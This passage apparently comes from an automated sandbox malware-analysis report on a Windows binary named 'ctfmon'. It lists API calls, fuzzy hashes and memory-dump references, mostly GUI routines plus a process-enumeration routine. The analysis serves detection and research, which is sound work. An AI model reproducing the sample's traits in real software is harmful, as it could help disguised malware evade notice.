        • Opcode Fuzzy Hash: 0eb3c0ce6568269592c83524268b6381258269ac00d58bd2e77033d507aac4d6
        • Instruction Fuzzy Hash: 78214B72A407019BE730BB719C85E2BB298DF54764F110A3FF522B62C2EB7D8C018669
        APIs
          • Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E
        • GetKeyState.USER32(00000010), ref: 0042360B
        • GetKeyState.USER32(00000011), ref: 00423614
        • GetKeyState.USER32(00000012), ref: 0042361D
        • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00423633
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: State$LongMessageSendWindow
        • String ID:
        • API String ID: 1063413437-0
        • Opcode ID: f08a36ac8abab3e89e4425618160d51b63b8717b140772f1c211ae5f2a27efec
        • Instruction ID: 218882e5c383a6313f97fdf1e6bc22957306ce5396ae17cae6112ddc5d99c2e4
        • Opcode Fuzzy Hash: f08a36ac8abab3e89e4425618160d51b63b8717b140772f1c211ae5f2a27efec
        • Instruction Fuzzy Hash: 26F0BE377403A936E5303AA22C42FAA81384B90FD6F80042AB701AA2D28D9D8943467C
        APIs
        • MonitorFromWindow.USER32(?,?), ref: 00405BB0
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FromMonitorWindow
        • String ID:
        • API String ID: 721739931-0
        • Opcode ID: 0ba1fc86d451cd674b8620c5ae4f720fa838888ad4e6d9ad1c3c2af6160355b6
        • Instruction ID: 27bb940a1f3bd50fed2c6d6a608dacda6c6e613f901876cb4841b3324aa04d70
        • Opcode Fuzzy Hash: 0ba1fc86d451cd674b8620c5ae4f720fa838888ad4e6d9ad1c3c2af6160355b6
        • Instruction Fuzzy Hash: C4F03131204609ABDF119F61CC499AF3BB8EF00344B548436FC15F51A0DB78EA55DF59
        APIs
        • GetWindowLongA.USER32(?,000000F0), ref: 0041E394
        • GetParent.USER32(?), ref: 0041E3AD
        • SetBkMode.GDI32(?,00000002), ref: 0041E3BD
        • GetClientRect.USER32(?,?), ref: 0041E3CF
        • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041E3F7
        • SelectObject.GDI32(?,00000000), ref: 0041E407
          • Part of subcall function 0041E040: InflateRect.USER32(?,000000FF,000000FF), ref: 0041E082
          • Part of subcall function 0041E040: IsWindowEnabled.USER32(?), ref: 0041E095
          • Part of subcall function 0041E040: InflateRect.USER32(?,000000FF,000000FF), ref: 0041E0BC
          • Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0D3
          • Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0EC
          • Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E104
          • Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E11E
          • Part of subcall function 0041E040: SelectObject.GDI32(?,?), ref: 0041E143
        • GetSysColor.USER32(0000000F), ref: 0041E419
        • SetBkColor.GDI32(?,00000000), ref: 0041E41D
        • GetSysColor.USER32(00000012), ref: 0041E425
        • SetTextColor.GDI32(?,00000000), ref: 0041E429
        • SendMessageA.USER32(?,00000135,?,?), ref: 0041E43B
        • SelectObject.GDI32(?,00000000), ref: 0041E443
        • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041E468
        • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E4A0
        • IsWindowEnabled.USER32(?), ref: 0041E4A7
        • SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0041E4BB
        • GetWindowTextA.USER32(?,?,00000100), ref: 0041E529
        • SelectObject.GDI32(?,?), ref: 0041E87F
        • SelectObject.GDI32(?,00000000), ref: 0041E892
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
        • String ID:
        • API String ID: 2549663215-0
        • Opcode ID: 3fd3a575849ad3d1436d3d32659979540c585af791503cc77f23874067242d08
        • Instruction ID: 6799aca15d36f123e668f58c1c135d1dd851374628879934b92dffa4031545d3
        • Opcode Fuzzy Hash: 3fd3a575849ad3d1436d3d32659979540c585af791503cc77f23874067242d08
        • Instruction Fuzzy Hash: D2F12875604301AFD310DF68CC85EAFB7E8FB88704F44492DFA8586250E7B9E945CB5A
        APIs
        • GetWindowLongA.USER32(?,000000F0), ref: 0041EBBE
        • SendMessageA.USER32(?,00000157,00000000,00000000), ref: 0041EBEA
        • HideCaret.USER32(?), ref: 0041EC00
        • GetWindowRect.USER32(?,?), ref: 0041EC0C
        • GetParent.USER32(?), ref: 0041EC13
        • ScreenToClient.USER32(00000000,?), ref: 0041EC27
        • ScreenToClient.USER32(00000000,?), ref: 0041EC33
        • GetDC.USER32(00000000), ref: 0041EC36
        • GetWindowLongA.USER32(?,000000F4), ref: 0041EC68
        • SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 0041EC95
        • SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 0041ECB6
        • GetClassNameA.USER32(00000000,?,00000010), ref: 0041ECC8
        • lstrcmpA.KERNEL32(?,ComboBox), ref: 0041ECD8
        • GetParent.USER32(00000000), ref: 0041ECFC
        • MapWindowPoints.USER32(00000000,0000029A,?,00000002), ref: 0041ED13
        • ReleaseDC.USER32(00000000,00000000), ref: 0041ED1B
        • GetDC.USER32(?), ref: 0041ED26
        • GetWindowLongA.USER32(00000000,000000F0), ref: 0041ED3C
        • GetWindow.USER32(00000000,00000005), ref: 0041ED57
        • GetWindowRect.USER32(00000000,?), ref: 0041ED63
        • SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 0041EDA0
        • ReleaseDC.USER32(?,00000000), ref: 0041EDB0
        • ShowCaret.USER32(?), ref: 0041EDB7
        • GetSystemMetrics.USER32(00000002), ref: 0041EDF8
        • GetSystemMetrics.USER32(00000002), ref: 0041EE57
        • GetSystemMetrics.USER32(00000015), ref: 0041EEA8
        • ReleaseDC.USER32(00000000,00000000), ref: 0041EECA
        • ShowCaret.USER32(?), ref: 0041EED8
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
        • String ID: ComboBox
        • API String ID: 930961256-1152790111
        • Opcode ID: 095c6ff481106a7ff09be76659a5ce7917ff468ea38e97da75e3ba20c683b7f8
        • Instruction ID: e5c296bea3933cf44f53e168aaf778f0ec2db8dd84e81f58de9af8b4068f9cfc
        • Opcode Fuzzy Hash: 095c6ff481106a7ff09be76659a5ce7917ff468ea38e97da75e3ba20c683b7f8
        • Instruction Fuzzy Hash: C391B571608301AFD320DB25DC89FBF77A8FB85744F40092DFA4196291D778E946CB5A
        APIs
        • EnterCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D2CB
        • GetDC.USER32(00000000), ref: 0041D2D3
        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041D2E4
        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041D2EB
        • GetSystemMetrics.USER32(00000001), ref: 0041D309
        • GetSystemMetrics.USER32(00000000), ref: 0041D314
        • ReleaseDC.USER32(00000000,00000000), ref: 0041D32A
        • GlobalAddAtomA.KERNEL32(C3d), ref: 0041D344
        • LeaveCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D360
        • GlobalAddAtomA.KERNEL32(C3dNew), ref: 0041D377
        • GlobalAddAtomA.KERNEL32(C3dL), ref: 0041D389
        • GlobalAddAtomA.KERNEL32(C3dH), ref: 0041D396
        • GlobalAddAtomA.KERNEL32(C3dLNew), ref: 0041D3BA
        • GlobalAddAtomA.KERNEL32(C3dHNew), ref: 0041D3C7
        • GlobalAddAtomA.KERNEL32(C3dD), ref: 0041D3EB
        • GetSystemMetrics.USER32(0000002A), ref: 0041D3FE
        • GetClassInfoA.USER32(00000000,004326E8,?), ref: 0041D441
        • GetClassInfoA.USER32(00000000,00008002,?), ref: 0041D45E
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
        • String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
        • API String ID: 1233821986-3277416593
        • Opcode ID: 8c3cc1726dc5f5e07f9ce3bacf8b38420d8711e0c0a32e7e01f5753ca4cfe4ff
        • Instruction ID: e50427c789af92de44b22dfa043ad602546bc15970a851fe98efa0f61ee8e012
        • Opcode Fuzzy Hash: 8c3cc1726dc5f5e07f9ce3bacf8b38420d8711e0c0a32e7e01f5753ca4cfe4ff
        • Instruction Fuzzy Hash: A2410FB8A403047AD720AB54DC817EE37A4BF59358F546037DD00972D0D7BC988D9BAA
        APIs
        • RegisterClipboardFormatW.USER32(Native), ref: 004293C3
        • RegisterClipboardFormatW.USER32(OwnerLink), ref: 004293CC
        • RegisterClipboardFormatW.USER32(ObjectLink), ref: 004293D6
        • RegisterClipboardFormatW.USER32(Embedded Object), ref: 004293E0
        • RegisterClipboardFormatW.USER32(Embed Source), ref: 004293EA
        • RegisterClipboardFormatW.USER32(Link Source), ref: 004293F4
        • RegisterClipboardFormatW.USER32(Object Descriptor), ref: 004293FE
        • RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 00429408
        • RegisterClipboardFormatW.USER32(FileName), ref: 00429412
        • RegisterClipboardFormatW.USER32(FileNameW), ref: 0042941C
        • RegisterClipboardFormatW.USER32(Rich Text Format), ref: 00429426
        • RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 00429430
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClipboardFormatRegister
        • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
        • API String ID: 1228543026-2889995556
        • Opcode ID: de80afb32674536e2f79b8ce14739d9050ed71d11b05ead950d31be3d13239dd
        • Instruction ID: edf7ca49e2a083f5ac172aeb54de25137a50422174a6044775e6e6b14afce90a
        • Opcode Fuzzy Hash: de80afb32674536e2f79b8ce14739d9050ed71d11b05ead950d31be3d13239dd
        • Instruction Fuzzy Hash: 5C017970B407A45ACB30BF73AC0995BBEE0EEC4B113A24D2FE48597690D6BCA505CF49
        APIs
          • Part of subcall function 0041C550: SetBkColor.GDI32(?), ref: 0041C56D
          • Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5BA
          • Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5E9
          • Part of subcall function 0041C550: SetBkColor.GDI32(?,?), ref: 0041C607
          • Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C632
          • Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C66C
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041E082
        • IsWindowEnabled.USER32(?), ref: 0041E095
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041E0BC
        • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0D3
        • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0EC
        • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E104
        • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E11E
        • SelectObject.GDI32(?,?), ref: 0041E143
        • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E167
        • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E187
        • SelectObject.GDI32(?,?), ref: 0041E19D
        • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 0041E1CB
        • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 0041E1EC
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041E202
        • SelectObject.GDI32(?,?), ref: 0041E21C
        • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 0041E244
        • IsWindowEnabled.USER32(?), ref: 0041E24F
        • SetTextColor.GDI32(?,?), ref: 0041E260
        • OffsetRect.USER32(?,00000001,00000001), ref: 0041E2EC
          • Part of subcall function 0041C550: SetBkColor.GDI32(?,00000000), ref: 0041C674
        • DrawTextA.USER32(?,?,?,?,00000020), ref: 0041E324
        • GetFocus.USER32 ref: 0041E330
        • InflateRect.USER32(?,00000001,00000001), ref: 0041E341
        • IntersectRect.USER32(?,?,?), ref: 0041E352
        • DrawFocusRect.USER32(?,?), ref: 0041E35E
        • SelectObject.GDI32(?,00000000), ref: 0041E371
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
        • String ID:
        • API String ID: 1611134597-0
        • Opcode ID: 1e5e9eaf120bb633d1c9d9fb497bf02f089c8a9b78752c289a9debf72a5f20d4
        • Instruction ID: 85d4594a04ea0c67e496ada25f94dcfd0f64e3c57ddc0f24227d28b8a825e15f
        • Opcode Fuzzy Hash: 1e5e9eaf120bb633d1c9d9fb497bf02f089c8a9b78752c289a9debf72a5f20d4
        • Instruction Fuzzy Hash: CBB13875208201AFD310DFA9CD84EAFB7E8FB88708F404A18FA59D2290D775E9858B56
        APIs
        • GetPropA.USER32(?,?), ref: 0041E915
        • CallWindowProcA.USER32(00000000), ref: 0041E93D
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID:
        • API String ID: 2276450057-0
        • Opcode ID: 8efb85a8f10c788bd4c9a0c68f31e7385fb8732264289b1c17e18871f870bad8
        • Instruction ID: 661fead8de9f1cb923f226e17cd232b8dad460699d7947674ae0cd3bb86e6aba
        • Opcode Fuzzy Hash: 8efb85a8f10c788bd4c9a0c68f31e7385fb8732264289b1c17e18871f870bad8
        • Instruction Fuzzy Hash: A361487A7443146BD230AB15EC84FFF375CEF86361F500122FE0092391DA29A98686BE
        APIs
        • GetModuleHandleW.KERNEL32(USER32,?,?,?,00405BA6), ref: 00405A8F
        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405AA7
        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405AB8
        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00405AC9
        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00405ADA
        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00405AEB
        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00405AFC
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: EnumDisplayMonitors$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
        • API String ID: 667068680-2547861404
        • Opcode ID: 441ffe43333a6545924900e7a1cc69255c0b587673d07ec35cb38ca00c6c66c5
        • Instruction ID: 86978abfdab4202489ccb7ed7906514a54c6f7a5da0540c36e1280f3304fae6d
        • Opcode Fuzzy Hash: 441ffe43333a6545924900e7a1cc69255c0b587673d07ec35cb38ca00c6c66c5
        • Instruction Fuzzy Hash: 88110070B10611DBC7515F69BCC3A6BBAF4B6987503A40C3FE109E23D0D778684AEE69
        APIs
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Focus$MessageParentStateWindow$BeepDialogH_prologItemNext
        • String ID:
        • API String ID: 1894107442-0
        • Opcode ID: 31fd434e58604c9b627ab793c01358e0faa122505644811c941e93cf9aaf4d9d
        • Instruction ID: 03bd421b11a5e9202270e7a8080601ea4524ec8c7accc3ec12f88eb2ceb1b5eb
        • Opcode Fuzzy Hash: 31fd434e58604c9b627ab793c01358e0faa122505644811c941e93cf9aaf4d9d
        • Instruction Fuzzy Hash: C8A1AF71A00219DACF24AB65D8C5BBF7B65EF04355F54423BE801B72E1C738DC429AAD
        APIs
        • EnterCriticalSection.KERNEL32(00540EE0,76944920,7622B510,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D237
        • GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 0041D260
        • lstrcmpiA.KERNEL32(?,kanji), ref: 0041D272
        • GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 0041D295
        • lstrcmpiA.KERNEL32(?,hangeul), ref: 0041D2A1
        • LeaveCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D2B3
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
        • String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
        • API String ID: 1105401458-111014456
        • Opcode ID: 60bf6964cc79a83cbd7df94c004cbf816ff3b48919ba2be90905dd6c73289552
        • Instruction ID: 4abe76d66403d63afbfbe3d47ea13df97799fd1973407ab64f2f1cd089386a62
        • Opcode Fuzzy Hash: 60bf6964cc79a83cbd7df94c004cbf816ff3b48919ba2be90905dd6c73289552
        • Instruction Fuzzy Hash: E201FC757443857AD210E765EC87FEA3F489769B48F212066F900B2192D2B840588BEE
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: H_prologlstrlen
        • String ID: `DvP?Dv
        • API String ID: 2133942097-2995021381
        • Opcode ID: 01c58e14bb4e93372598d57a4fe51dd16b9f4830cd3f4e6c793004653f3c11c2
        • Instruction ID: 50e1f89d1f17318e9a9081ba82e25bfcf0167d2f1df0f58284690d34baa27448
        • Opcode Fuzzy Hash: 01c58e14bb4e93372598d57a4fe51dd16b9f4830cd3f4e6c793004653f3c11c2
        • Instruction Fuzzy Hash: DAD1C371E00219DFDF11DF94E980AAEBBB1FF44314F64452AE801A7351D738A961CB5A
        APIs
        • EnumProcesses.PSAPI(?,00001000,?,PROCS,?,004025AC), ref: 00403A3E
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00001000,?,PROCS,?,004025AC), ref: 00403A5B
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CreateEnumProcessesSnapshotToolhelp32
        • String ID: +*&=^^^^--------PROCS$PROCS
        • API String ID: 3846999141-2662039986
        • Opcode ID: ec872aaca7dab5de4dc8b0dbbf1885990af5137ecd8fa4750e36b93221478237
